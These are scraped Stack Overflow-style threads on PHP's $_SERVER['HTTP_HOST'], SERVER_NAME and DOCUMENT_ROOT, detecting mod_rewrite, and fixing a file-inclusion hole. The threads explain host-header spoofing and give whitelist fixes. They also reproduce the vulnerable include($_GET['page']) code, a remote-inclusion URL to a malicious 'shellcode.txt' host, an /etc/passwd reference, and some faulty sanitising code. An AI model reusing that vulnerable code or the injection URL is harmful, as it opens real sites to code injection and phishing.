I have my site on the server http://www.myserver.uk.com.
On this server I have two domains:
one.com and two.com
I would like to get the current domain using PHP, but if I use $_SERVER['HTTP_HOST'] then it is showing me
myserver.uk.com
instead of:
one.com or two.com
How can I get the domain, and not the server name?
Try using this:
$_SERVER['SERVER_NAME']
Or parse:
$_SERVER['REQUEST_URI']
Reference: apache_request_headers()
The best use would be
echo $_SERVER['HTTP_HOST'];
And it can be used like this:
if (strpos($_SERVER['HTTP_HOST'], 'banana.com') !== false) {
echo "Yes this is indeed the banana.com domain";
}
This code below is a good way to see all the variables in $_SERVER in a structured HTML output with your keywords highlighted that halts directly after execution. Since I do sometimes forget which one to use myself - I think this can be nifty.
<?php
// Change banana.com to the domain you were looking for..
$wordToHighlight = "banana.com";
$serverVarHighlighted = str_replace( $wordToHighlight, '<span style=\'background-color:#883399; color: #FFFFFF;\'>'. $wordToHighlight .'</span>', $_SERVER );
echo "<pre>";
print_r($serverVarHighlighted);
echo "</pre>";
exit();
?>
The only secure way of doing this
The only guaranteed secure method of retrieving the current domain is to store it in a secure location yourself.
Most frameworks take care of storing the domain for you, so you will want to consult the documentation for your particular framework. If you're not using a framework, consider storing the domain in one of the following places:
Secure methods of storing the domain
Used By
A configuration file
Joomla, Drupal/Symfony
The database
WordPress
An environmental variable
Laravel
A service registry
Kubernetes DNS
The following work... but they're not secure
Hackers can make the following variables output whatever domain they want. This can lead to cache poisoning and barely noticeable phishing attacks.
$_SERVER['HTTP_HOST']
This gets the domain from the request headers which are open to manipulation by hackers. Same with:
$_SERVER['SERVER_NAME']
This one can be made better if the Apache setting usecanonicalname is turned off; in which case $_SERVER['SERVER_NAME'] will no longer be allowed to be populated with arbitrary values and will be secure. This is, however, non-default and not as common of a setup.
In popular systems
Below is how you can get the current domain in the following frameworks/systems:
WordPress
$urlparts = parse_url(home_url());
$domain = $urlparts['host'];
If you're constructing a URL in WordPress, just use home_url or site_url, or any of the other URL functions.
Laravel
request()->getHost()
The request()->getHost function is inherited from Symfony, and has been secure since the 2013 CVE-2013-4752 was patched.
Drupal
The installer does not yet take care of making this secure (issue #2404259). But in Drupal 8 there is documentation you can you can follow at Trusted Host Settings to secure your Drupal installation after which the following can be used:
\Drupal::request()->getHost();
Other frameworks
Feel free to edit this answer to include how to get the current domain in your favorite framework. When doing so, please include a link to the relevant source code or to anything else that would help me verify that the framework is doing things securely.
Addendum
Exploitation examples:
Cache poisoning can happen if a botnet continuously requests a page using the wrong hosts header. The resulting HTML will then include links to the attackers website where they can phish your users. At first the malicious links will only be sent back to the hacker, but if the hacker does enough requests, the malicious version of the page will end up in your cache where it will be distributed to other users.
A phishing attack can happen if you store links in the database based on the hosts header. For example, let say you store the absolute URL to a user's profiles on a forum. By using the wrong header, a hacker could get anyone who clicks on their profile link to be sent a phishing site.
Password reset poisoning can happen if a hacker uses a malicious hosts header when filling out the password reset form for a different user. That user will then get an email containing a password reset link that leads to a phishing site. Another more complex form of this skips the user having to do anything by getting the email to bounce and resend to one of the hacker's SMTP servers (for example CVE-2017-8295.)
Here are some more malicious examples
Additional Caveats and Notes:
When usecanonicalname is turned off the $_SERVER['SERVER_NAME'] is populated with the same header $_SERVER['HTTP_HOST'] would have used anyway (plus the port). This is Apache's default setup. If you or DevOps turns this on then you're okay -- ish -- but do you really want to rely on a separate team, or yourself three years in the future, to keep what would appear to be a minor configuration at a non-default value? Even though this makes things secure, I would caution against relying on this setup.
Red Hat, however, does turn usecanonical on by default [source].
If serverAlias is used in the virtual hosts entry, and the aliased domain is requested, $_SERVER['SERVER_NAME'] will not return the current domain, but will return the value of the serverName directive.
If the serverName cannot be resolved, the operating system's hostname command is used in its place [source].
If the host header is left out, the server will behave as if usecanonical
was on [source].
Lastly, I just tried exploiting this on my local server, and was unable to spoof the hosts header. I'm not sure if there was an update to Apache that addressed this, or if I was just doing something wrong. Regardless, this header would still be exploitable in environments where virtual hosts are not being used.
A Little Rant:
This question received hundreds of thousands of views without a single mention of the security problems at hand! It shouldn't be this way, but just because a Stack Overflow answer is popular, that doesn't mean it is secure.
Using $_SERVER['HTTP_HOST'] gets me (subdomain.)maindomain.extension. It seems like the easiest solution to me.
If you're actually 'redirecting' through an iFrame, you could add a GET parameter which states the domain.
<iframe src="myserver.uk.com?domain=one.com"/>
And then you could set a session variable that persists this data throughout your application.
Try $_SERVER['SERVER_NAME'].
Tips: Create a PHP file that calls the function phpinfo() and see the "PHP Variables" section. There are a bunch of useful variables we never think of there.
To get the domain:
$_SERVER['HTTP_HOST']
Domain with protocol:
$protocol = strpos(strtolower($_SERVER['SERVER_PROTOCOL']), 'https') === FALSE ? 'http' : 'https';
$domainLink = $protocol . '://' . $_SERVER['HTTP_HOST'];
Protocol, domain, and queryString total:
$url = $protocol . '://' . $_SERVER['HTTP_HOST'] . '?' . $_SERVER['QUERY_STRING'];
**As the $_SERVER['SERVER_NAME'] is not reliable for multi-domain hosting!
I know this might not be entirely on the subject, but in my experience, I find storing the WWW-ness of the current URL in a variable useful.
In addition, please see my comment below, to see what this is getting at.
This is important when determining whether to dispatch Ajax calls with "www", or without:
$.ajax("url" : "www.site.com/script.php", ...
$.ajax("url" : "site.com/script.php", ...
When dispatching an Ajax call the domain name must match that of in the browser's address bar, and otherwise you will have an Uncaught SecurityError in the console.
So I came up with this solution to address the issue:
<?php
substr($_SERVER['SERVER_NAME'], 0, 3) == "www" ? $WWW = true : $WWW = false;
if ($WWW) {
/* We have www.example.com */
} else {
/* We have example.com */
}
?>
Then, based on whether $WWW is true, or false run the proper Ajax call.
I know this might sound trivial, but this is such a common problem that is easy to trip over.
Everybody is using the parse_url function, but sometimes a user may pass the argument in different formats.
So as to fix that, I have created a function. Check this out:
function fixDomainName($url='')
{
$strToLower = strtolower(trim($url));
$httpPregReplace = preg_replace('/^http:\/\//i', '', $strToLower);
$httpsPregReplace = preg_replace('/^https:\/\//i', '', $httpPregReplace);
$wwwPregReplace = preg_replace('/^www\./i', '', $httpsPregReplace);
$explodeToArray = explode('/', $wwwPregReplace);
$finalDomainName = trim($explodeToArray[0]);
return $finalDomainName;
}
Just pass the URL and get the domain.
For example,
echo fixDomainName('https://stackoverflow.com');
will return:
stackoverflow.com
And in some situation:
echo fixDomainName('stackoverflow.com/questions/id/slug');
And it will also return stackoverflow.com.
This quick & dirty works for me.
Whichever way you get the string containing the domain you want to extract, i.e. using a super global -$_SERVER['SERVER_NAME']- or, say, in Drupal: global $base_url, regex is your friend:
global $base_url;
preg_match("/\w+\.\w+$/", $base_url, $matches);
$domain = $matches[0];
The particular regex string I am using in the example will only capture the last two components of the $base_url string, of course, but you can add as many "\w+." as desired.
Hope it helps.
Related
I am back with a simple question (or related question).
The question is simple however I have not received an answer yet. I have asked many people with different experience in PHP. But the response I get is: "I don't have any idea. I've never thought about that." Using Google I have not been able to find any article on this. I hope that I will get a satisfying answer here.
So the question is:
What is the difference between $_SERVER['DOCUMENT_ROOT'] and $_SERVER['HTTP_HOST'] ?
Are there any advantages of one over the other?
Where should we use HTTP_HOST & where to use DOCUMENT_ROOT?
DOCUMENT_ROOT
The root directory of this site defined by the 'DocumentRoot' directive in the General Section or a section e.g.
DOCUMENT_ROOT=/var/www/example
HTTP_HOST
The base URL of the host e.g.
HTTP_HOST=www.example.com
The document root is the local path to your website, on your server; The http host is the hostname of the server. They are rather different; perhaps you can clarify your question?
Edit:
You said:
Case 1 : header('Location: '. $_SERVER['DOCUMENT_ROOT'] . '/abc.php')
Case 2: header('Location: '. $_SERVER['HTTP_HOST'] . '/abc.php')
I suspect the first is only going to work if you run your browser on the same machine that's serving the pages.
Imagine if someone else visits your website, using their Windows machine. And your webserver tells them in the HTTP headers, "hey, actually, redirect this location: /var/www/example/abc.php." What do you expect the user's machine to do?
Now, if you're talking about something like
<?php include($_SERVER['DOCUMENT_ROOT'] . '/include/abc.php') ?>
vs
<?php include($_SERVER['HTTP_HOST'] . '/include/abc.php') ?>
That might make sense. I suspect in this case the former is probably preferred, although I am not a PHP Guru.
<?php include($_SERVER['DOCUMENT_ROOT'] . '/include/abc.php') ?>
should be used for including the files in another file.
header('Location: '. $_SERVER['HTTP_HOST'] . '/abc.php')
should be used for hyperlinking
Eh, what's the question? DOCUMENT_ROOT contains the path to current web, in my case /home/www. HTTP_HOST contains testing.local, as it runs on local domain. The difference is obvious, isn't it?
I cannot figure out where you could interchange those two, so why should you consider advantages?
HTTP_HOST will give you URL of the host, e.g. domain.com
DOCUMENT_ROOT will give you absolute path to document root of the website in server's file system, e.g. /var/www/domain/
Btw, have you tried looking at PHP's manual, specifically $_SERVER? Everything is explanied there.
if you want domain path like 'example.com', you can use "HTTP_HOST"
if you want folder '/public_html/foldername/' path you can use
"DOCUMENT_ROOT"
$_SERVER ['HTTP_HOST'] is defined by the client and may not even be set! You can repeat a request and withhold the header for local testing in developer tools such as for Waterfox/Firefox. You must determine if this header is set and if the host being requested exists (one of the very first things you do, even before starting to send any of your headers) otherwise the appropriate action is to kill the entire process and respond with an HTTP 400 Bad Request. This goes for all server-side programming languages.
$_SERVER['DOCUMENT_ROOT'] is defined by the server as the directory which the executing script is located. Examples:
public_html/example.php = public_html/
public_html/test1/example.php = public_html/test1/
Keep in mind that if you're using Apache rewrites that there is a difference between the $_SERVER['REQUEST_URI'] (the URL requested) and $_SERVER['PHP_SELF'] (the file handling the request).
The Title question is perfectly awnsered by John Ledbetter.
This awnser is intended to expand and offer additional information about what seems to be the original poster inner concerns:
Where would make sense to use the URL based location: $_SERVER['HTTP_HOST'] ?
Where would make sense to use the local based location: $_SERVER['DOCUMENT_ROOT'] ?
Where both can be used, what are the Advantages and Disadvantages of each one. ?
Following my awnsers:
By usign the HTTP_HOST you can abstract yourself from the machine Folder System which means in cases where portability is a concern and you are expected to install the Application on multiple servers potentially with diferent OS this approach could be easier to maintain.
You can also take advantage of HTTP_HOST if your server is going to become unavailible and you want a diferent one from the cluster to handle the request.
By Using the DOCUMENT_ROOT you can access the whole filesystem (depends on the permissions you give to php) it makes sense if you want to access a program which you dont want to be accesible from the web or when the Folder System is relevant to your Application.
You can also take advantage of DOCUMENT_ROOT to get the subsite root instead of the Host.
$_SERVER['HTTP_HOST'] = "www.example.com";
$_SERVER['DOCUMENT_ROOT'] = "var/www/domain/subsite1" // equivalent to www.example.com/subsite1
$_SERVER ['HTTP_HOST'] returns the domain url
a.g. www.example.com
While $_SERVER['DOCUMENT_ROOT'] returns the roof of current web..
Such as
Other answers have alluded to it, but I wanted to add an answer just to be sharp as a grizzly bear tooth in one point - don't trust $_SERVER['HTTP_HOST'] as safe where following code does:
<?php
header('Location: '. $_SERVER['HTTP_HOST'] . '/abc.php');
#Or
include($_SERVER['HTTP_HOST'] . '/include/abc.php');
?>
The variable is subject to manipulation by the incoming request and could contribute to an exploit. This may depend on your server configuration, but you don't want something filling out this variable for you :)
See also:
https://security.stackexchange.com/questions/32299/is-server-a-safe-source-of-data-in-php
https://expressionengine.com/blog/http-host-and-server-name-security-issues
How can I get real host name by not using $_SERVER['SERVER_NAME'] in PHP? Is there other more reliable way to get it ?
I have created a function which gets host name from the path to the domain.
I would like to avoid using $_SERVER['SERVER_NAME'] variable, because it can be faked by sending modified headers in the HTTP request.
This is my current implementation (this works if the path has an actual domain name in it. For instance: /vhosts/website.com/public_html):
function getServerName() {
$path = realpath(__FILE__);
$url = array();
preg_match_all("/\/[a-z0-9-]+(\.[a-z0-9-]+)+/i", $path, $url);
// 4 is minimum requirement for the address (e.g: http://www.in.tv)
if (strlen($url[0][0]) > 4) {
$result = str_replace("/", "", $url[0][0]);
return $result;
}
else
return false;
}
Thanks!
If you want a server name that can't be set by the client, use $_SERVER['SERVER_NAME']. It is set by the server itself but can also be forged under certain circumstances using a bug, as Gumbo points out and links to in the comments.
I think the one you are referring to is
$_SERVER['HTTP_HOST'];
which, given the HTTP prefix means it comes from the HTTP Headers.
You might want to use:
$_SERVER['SERVER_NAME']
which is defined by the server and can't be changed via a request?
this will get the hostname server-side, but if you're running on a commercial host (not hosting yourself), I don't imagine this will be all that useful.
$host = php_uname( 'n' );
If you're using Apache, what you should do is make your server / site only answer to certain names (else there should be a default that doesn't do much). You can do with with the ServerName and ServerAlias directives.
Edit: as pointed by Gumbo, the original poster probably means HTTP_HOST rather than HOST_NAME. Otherwise, my answer is plain wrong.
The HTTP_HOST variable reflects the domain name that the visitor used to access the site. If doesn't have anything to do with file paths! Its value is conveniently stored in $_SERVER['HTTP_HOST']. Is there any other way to get it? Of course, there're normally several ways to do things. For instance, this works when PHP runs as Apache module.
<?php
$request_headers = apache_request_headers();
echo $request_headers['Host'];
?>
The question is: why would anyone want to do such a thing? Why replace a reliable standard method with a quirky workaround that eventually fetches the same piece of data from the same place?
You have the concern that $_SERVER['HTTP_HOST'] is altered by the HTTP request. Of course it is: that's where it comes from. The browser has to specify what site it wants to visit (that's the base of name based virtual hosts) and if it sends a rogue value, well, it just won't reach the site.
Of course $_SERVER['HTTP_HOST'] can be modified by the client - because in fact IT IS sent by the client. This is part of the http protocol. If you want to get the primary server name defined in the vhost configuration of apache or whatever you can access $_SERVER['SERVER_NAME'] as proposed by the others.
I suggest it is not wise to extract the domain name from the file path of the server (which is stored in __FILE__) as it may render your application non-relocatable (it will no longer be storage location agnostic).
You may see the contents of the array by dumping it within the script using var_dump($_SERVER) but keep in mind the not all web servers and all web server settings expose the same environment. This is documented in the web server documentation and I think it is partly documented in the php online docs.
Update / Important notice: As others pointed out, the content of $_SERVER['SERVER_NAME'] could be spoofed if apache is configured for UseCanonicalName off (which may be a default setting if you are using eg Plesk-based hosting). So actually going with the __FILE__ can solve this (if your doc root contains the host name). The bigger problem of the first approach is that it can be used to inject any sort of stuff into your application (SQL, JavaScript) because php programmers usually take it granted that SERVER_NAME is no user input and thus apply no sanitizing to it.
You don't. That's the purpose of the $_SERVER variables. If you want to get the HOST_NAME from the path, you must first get the PATH from $_SERVER['HTTP_HOST']
What I want to ask is if there is a way to find out if a web-server instance has URL Rewriting enabled. I need this in order to be able to instantiate the correct type of URL handler.
Theoretically you know in advance if you have it enabled or not and can use something to configure it. I would like, however, to be able to detect this setting automatically at runtime.
The URL rewrite rule would be something very simple like:
^/(.*)$ => /bootstrap.php
This guarantees that the relevant string is present in the REQUEST_URI, but doesn't pollute the _GET array.
Where did my research took me so far:
Apache.
In my opinion Apache has a very quirky approach, since it sets the REDIRECT_SCRIPT_URI header for rewrote URLs, but not for the ones that are not rewrote.
E.g. http://host/ana/are/mere would be re-wrote to index.php so the aforementioned header would be present, but http://host/ wouldn't be re-wrote.
Lighttpd.
Lighttpd with fast-cgi behaves OK, setting the REDIRECT_URI header if URL Rewrite is enabled for the current host. This is reliable.
Cherokee.
Well, for Cherokee there is no method that I found out, as it uses (in my opinion) a more complicated method for obtaining URL rewriting. (I.e., it's called internal redirect – and the fcgi process doesn't know that the request was redirected)
Also I haven't tested other http servers, as nginx, so if someone has some input on this matter I would love to hear it.
Not the most elegant solution, but you could create a directory, insert a .htaccess and a small php file and try to open it with curl/file_get_contents() from your actual code:
.htaccess
RewriteEngine on
RewriteRule ^(.*?)$ index.php?myparam=$1
index.php
<?php
//open with file_get_contents("http://yoursite/directory/test")
if($_GET['myparam']){die("active");}
?>
Although this might be acceptable during an installation, for performance reasons this shouldn't be used for every request on your site! Save the information somewhere (sqlite/textfile).
Update
Apache specific, but apache_get_modules()/phpinfo() in combination with array_search/strpos is maybe helpful to you.
It's already touched upon below, but I believe the following recipe is a rather waterproof solution to this problem:
Set up the redirection
Request a page through its rewritten url
If the request returns the page in question, you have redirection set up correctly, if you get HTTP 404 response, then it's not working.
The idea is basically that this works with just about any redirection method. It has already been mentioned, but bears reiterating, such tricks add quite a bit of overhead and are better performed only once (installation or from the settings panel) and then saved in the settings.
Some implementation details, choices to make and a little on how I came to this solution:
I remembered Drupal did such a check during the installing process, so I looked up how they did it. They had the javascript on the install page do an ajax request (synchronously, to prevent concurrency issues with the database). This requires the user installing the software to have javascript turned on, but I don't think that's an unreasonable requirement.
However, I do think using php to request the page might be a cleaner solution. Alongside not bothering with a javascript requirement, it also needs less data to be sent back and forth and just doesn't require the logic of the action to be spread over multiple files. I don't know if there are other (dis)advantage for either method, but this should get you going and let you explore the alternative choices yourself.
There is another choice to be made: whether to test in a test environment or on the normal site. The thing Drupal does is just have the redirection always turned on (such as in the apache case, have the .htaccess file that does redirects just be part of the Drupal download) but only write the fancy urls if the redirection is turned on in the settings. This has the disadvantage that it takes more work to detect which type of redirection is used, but it's still possible (you can for example add a GET variable showing the redirection engine either on a specific test page or even on every page, or you can redirect to a page that sets $redirectionEngine and then includes the real index). Though I don't have much experience with redirection other than with mod_rewrite on apache, I believe this should work with just about every redirection engine.
The other option here is to use a test environment. Basically the idea is to either create a folder and set up redirection for it, or remove the need for file system write access and instead have a folder (or a folder for each redirection engine). This has some disadvantages: you still need write access to set up the redirection for the main site (though maybe not for all redirection engine, I don't really know how you all set them up properly - but for apache you will need write access if you are going to turn on redirection), it might be easier for a bot to detect what software and what version of it you are using through accessing the tests (unless you remove the test folders after testing) and you need to be able to rewrite for only a part of the site (which makes sense for any redirection engine to be a possibility, but I'm not blindly going to assume this functionality). However, this does come with the advantage of it being easier to find out which rewrite engine is being used or basically any other aspect of the redirection. There might also be other advantages I don't know of, so I just give the options and let you pick your method yourself.
With some options left to the user, I believe this should help you set up the system in the manner that you like.
PHP has server-specific functions for Apache, IIS and NSAPI servers. I only have Apache but as merkuro suggested this works as expected:
<?php
if (in_array('mod_rewrite',#apache_get_modules()))
echo 'mod_rewrite enabled';
else
echo 'mod_rewrite not enabled';
?>
As PHP server-specific functions don't cover all the servers you'd like to test in this probably isn't the best solution.
I'd recommend merkuro's first answer - implementing then testing it in script. I believe it's the only way to get a good result.
Hope that helps!
You can programmatically check for the existence of mod_rewrite if the server is Apache by using the apache_get_modules() function in PHP:
$modules = apache_get_modules();
echo in_array('mod_rewrite', $modules) ? 'mod_rewrite detected' : 'mod_rewrite not detected';
This could be used as the first step, but it is not a full proof method by any means. Just because mod_rewrite is loaded does not mean it is available for your environment. This also doesn't help if you are on a server that is not Apache.
There are not many consistent methods that will work across all platform combinations. But since the result is consistent, you can test for that. Setup a special redirect, and have a script use PHP's cURL or file_get_contents() to check a test URL. If the redirect was successful, you will get the expected content, and you can test easily for this.
This is a basic .htaccess I setup to redirect ajax to ajax.php:
RewriteEngine On
RewriteRule ajax ajax.php [L]
The following PHP script will attempt to get the contents of ajax. The real script name is ajax.php. If the redirect fails, then it will not get the expected contents.
error_reporting(E_ALL | E_STRICT);
$url = 'http://'.$_SERVER['HTTP_HOST'].dirname($_SERVER['REQUEST_URI']).'/ajax';
$result = json_decode(#file_get_contents($url));
echo ($result === "foobar") ? 'mod_rewrite test was successful' : 'mod_rewrite test failed';
Lastly, here is the final piece of the script, ajax.php. This returns an the expected response when the redirect is successful:
echo json_encode('foobar');
I have setup a live example of this test, and I have also made available the full sources.
As all the awnser already mention, actually testing it is the only way to be sure it works. But instead of actually redirecting to an actual page and waiting for it to load, I would just check the header.
In my opinion this is quickly enough to be even used at runtime at a regular site. If it realy needs to be high performance, then ofcourse caching it is better.
Just put something like the following in your .htaccess file
RewriteEngine on
RewriteRule ^/redir/My/Super/Special/Hidden/Url/To/Test/$ /redir/longload.php [L,R=307]
And then you can use the following php code to check if mod_rewrite is enabled.
<?php
function HasModRewrite() {
$s = empty($_SERVER["HTTPS"]) ? '' : ($_SERVER["HTTPS"] == "on") ? "s" : "";
$sp = strtolower($_SERVER["SERVER_PROTOCOL"]);
$protocol = substr($sp, 0, strpos($sp, "/")) . $s;
$port = ($_SERVER["SERVER_PORT"] == "80") ? "" : (":".$_SERVER["SERVER_PORT"]);
$options['http'] = array(
'method' => "HEAD",
'follow_location' => 0,
'ignore_errors' => 1,
'timeout' => 0.2
);
$context = stream_context_create($options);
$body = file_get_contents($protocol . "://" . $_SERVER['SERVER_NAME'] . $port .'/redir/My/Super/Special/Hidden/Url/To/Test/', NULL, $context);
if (!empty($http_response_header))
{
return substr_count($http_response_header[0], ' 307')>0;
}
return false;
}
$st = microtime();
$x = HasModRewrite();
$t = microtime()-$st;
echo 'Loaded in: '.$t.'<hr>';
var_dump($x);
?>
output:
Loaded in: 0.002657
---------------------
bool(true)
I'm using php and I have the following code to convert an absolute path to a url.
function make_url($path, $secure = false){
return (!$secure ? 'http://' : 'https://').str_replace($_SERVER['DOCUMENT_ROOT'], $_SERVER['HTTP_HOST'], $path);
}
My question is basically, is there a better way to do this in terms of security / reliability that is portable between locations and servers?
The HTTP_HOST variable is not a reliable or secure value as it is also being sent by the client. So be sure to validate its value before using it.
I don't think security is going to be effected, simply because this is a url, being printed to a browser... the worst that can happen is exposing the full directory path to the file, and potentially creating a broken link.
As a little side note, if this is being printed in a HTML document, I presume you are passing the output though something like htmlentities... just in-case the input $path contains something like a [script] tag (XSS).
To make this a little more reliable though, I wouldn't recommend matching on 'DOCUMENT_ROOT', as sometimes its either not set, or won't match (e.g. when Apache rewrite rules start getting in the way).
If I was to re-write it, I would simply ensure that 'HTTP_HOST' is always printed...
function make_url($path, $secure = false){
return (!$secure ? 'http://' : 'https://').$_SERVER['HTTP_HOST'].str_replace($_SERVER['DOCUMENT_ROOT'], '', $path);
}
... and if possible, update the calling code so that it just passes the path, so I don't need to even consider removing the 'DOCUMENT_ROOT' (i.e. what happens if the path does not match the 'DOCUMENT_ROOT')...
function make_url($path, $secure = false){
return (!$secure ? 'http://' : 'https://').$_SERVER['HTTP_HOST'].$path;
}
Which does leave the question... why have this function?
On my websites, I simply have a variable defined at the beggining of script execution which sets:
$GLOBALS['webDomain'] = 'http://' . (isset($_SERVER['HTTP_HOST']) ? $_SERVER['HTTP_HOST'] : '');
$GLOBALS['webDomainSSL'] = $GLOBALS['webDomain'];
Where I use GLOBALS so it can be accessed anywhere (e.g. in functions)... but you may also want to consider making a constant (define), if you know this value won't change (I sometimes change these values later in a site wide configuration file, for example, if I have an HTTPS/SSL certificate for the website).
I think this is the wrong approach.
URLs in a HTML support relative locations. That is, you can do link to refer to a page that has the same path in its URL as the corrent page. You can also do link to provide a full path to the same website. These two tricks mean your website code doesn't really need to know where it is to provide working URLs.
That said, you might need some tricks so you can have one website on http://www.example.com/dev/site.php and another on http://www.example.com/testing/site.php. You'll need some code to figure out which directory prefix is being used, but you can use a configuration value to do that. By which I mean a value that belongs to that (sub-)site's configuration, not the version-controlled code!
My website was recently attacked by, what seemed to me as, an innocent code:
<?php
if ( isset( $ _GET['page'] ) ) {
include( $ _GET['page'] . ".php" );
} else {
include("home.php");
}
?>
There where no SQL calls, so I wasn't afraid for SQL Injection. But, apparently, SQL isn't the only kind of injection.
This website has an explanation and a few examples of avoiding code injection: http://www.theserverpages.com/articles/webmasters/php/security/Code_Injection_Vulnerabilities_Explained.html
How would you protect this code from code injection?
Use a whitelist and make sure the page is in the whitelist:
$whitelist = array('home', 'page');
if (in_array($_GET['page'], $whitelist)) {
include($_GET['page'].'.php');
} else {
include('home.php');
}
Another way to sanitize the input is to make sure that only allowed characters (no "/", ".", ":", ...) are in it. However don't use a blacklist for bad characters, but a whitelist for allowed characters:
$page = preg_replace('[^a-zA-Z0-9]', '', $page);
... followed by a file_exists.
That way you can make sure that only scripts you want to be executed are executed (for example this would rule out a "blabla.inc.php", because "." is not allowed).
Note: This is kind of a "hack", because then the user could execute "h.o.m.e" and it would give the "home" page, because all it does is removing all prohibited characters. It's not intended to stop "smartasses" who want to cute stuff with your page, but it will stop people doing really bad things.
BTW: Another thing you could do in you .htaccess file is to prevent obvious attack attempts:
RewriteEngine on
RewriteCond %{QUERY_STRING} http[:%] [NC]
RewriteRule .* /–http– [F,NC]
RewriteRule http: /–http– [F,NC]
That way all page accesses with "http:" url (and query string) result in an "Forbidden" error message, not even reaching the php script. That results in less server load.
However keep in mind that no "http" is allowed in the query string. You website might MIGHT require it in some cases (maybe when filling out a form).
BTW: If you can read german: I also have a blog post on that topic.
The #1 rule when accepting user input is always sanitize it. Here, you're not sanitizing your page GET variable before you're passing it into include. You should perform a basic check to see if the file exists on your server before you include it.
Pek, there are many things to worry about an addition to sql injection, or even different types of code injection. Now might be a good time to look a little further into web application security in general.
From a previous question on moving from desktop to web development, I wrote:
The OWASP Guide to Building Secure Web Applications and Web Services should be compulsory reading for any web developer that wishes to take security seriously (which should be all web developers). There are many principles to follow that help with the mindset required when thinking about security.
If reading a big fat document is not for you, then have a look at the video of the seminar Mike Andrews gave at Google a couple years back about How To Break Web Software.
I'm assuming you deal with files in the same directory:
<?php
if (isset($_GET['page']) && !empty($_GET['page'])) {
$page = urldecode($_GET['page']);
$page = basename($page);
$file = dirname(__FILE__) . "/{$page}.php";
if (!file_exists($file)) {
$file = dirname(__FILE__) . '/home.php';
}
} else {
$file = dirname(__FILE__) . '/home.php';
}
include $file;
?>
This is not too pretty, but should fix your issue.
pek, for a short term fix apply one of the solutions suggested by other users. For a mid to long term plan you should consider migrating to one of existing web frameworks. They handle all low-level stuff like routing and files inclusion in reliable, secure way, so you can focus on core functionalities.
Do not reinvent the wheel. Use a framework. Any of them is better than none. The initial time investment in learning it pays back almost instantly.
Some good answers so far, also worth pointing out a couple of PHP specifics:
The file open functions use wrappers to support different protocols. This includes the ability to open files over a local windows network, HTTP and FTP, amongst others. Thus in a default configuration, the code in the original question can easily be used to open any arbitrary file on the internet and beyond; including, of course, all files on the server's local disks (that the webbserver user may read). /etc/passwd is always a fun one.
Safe mode and open_basedir can be used to restrict files outside of a specific directory from being accessed.
Also useful is the config setting allow_url_fopen, which can disable URL access to files, when using the file open functions. ini-set can be used to set and unset this value at runtime.
These are all nice fall-back safety guards, but please use a whitelist for file inclusion.
I know this is a very old post and I expect you don't need an answer anymore, but I still miss a very important aspect imho and I like it to share for other people reading this post. In your code to include a file based on the value of a variable, you make a direct link between the value of a field and the requested result (page becomes page.php). I think it is better to avoid that.
There is a difference between the request for some page and the delivery of that page. If you make this distinction you can make use of nice urls, which are very user and SEO friendly. Instead of a field value like 'page' you could make an URL like 'Spinoza-Ethica'. That is a key in a whitelist or a primary key in a table from a database and will return a hardcoded filename or value. That method has several advantages besides a normal whitelist:
the back end response is effectively independent from the front end request. If you want to set up your back end system differently, you do not have to change anything on the front end.
Always make sure you end with hardcoded filenames or an equivalent from the database (preferrabley a return value from a stored procedure), because it is asking for trouble when you make use of the information from the request to build the response.
Because your URLs are independent of the delivery from the back end you will never have to rewrite your URLs in the htAccess file for this kind of change.
The URLs represented to the user are user friendly, informing the user about the content of the document.
Nice URLs are very good for SEO, because search engines are in search of relevant content and when your URL is in line with the content will it get a better rate. At least a better rate then when your content is definitely not in line with your content.
If you do not link directly to a php file, you can translate the nice URL into any other type of request before processing it. That gives the programmer much more flexibility.
You will have to sanitize the request, because you get the information from a standard untrustfull source (the rest of the Web). Using only nice URLs as possible input makes the sanitization process of the URL much simpler, because you can check if the returned URL conforms your own format. Make sure the format of the nice URL does not contain characters that are used extensively in exploits (like ',",<,>,-,&,; etc..).
#pek - That won't work, as your array keys are 0 and 1, not 'home' and 'page'.
This code should do the trick, I believe:
<?php
$whitelist = array(
'home',
'page',
);
if(in_array($_GET['page'], $whitelist)) {
include($_GET['page'] . '.php');
} else {
include('home.php');
}
?>
As you've a whitelist, there shouldn't be a need for file_exists() either.
Think of the URL is in this format:
www.yourwebsite.com/index.php?page=http://malicodes.com/shellcode.txt
If the shellcode.txt runs SQL or PHP injection, then your website will be at risk, right? Do think of this, using a whitelist would be of help.
There is a way to filter all variables to avoid the hacking. You can use PHP IDS or OSE Security Suite to help avoid the hacking. After installing the security suite, you need to activate the suite, here is the guide:
http://www.opensource-excellence.com/shop/ose-security-suite/item/414.html
I would suggest you turn on layer 2 protection, then all POST and GET variables will be filtered especially the one I mentioned, and if there are attacks found, it will report to you immediately/
Safety is always the priority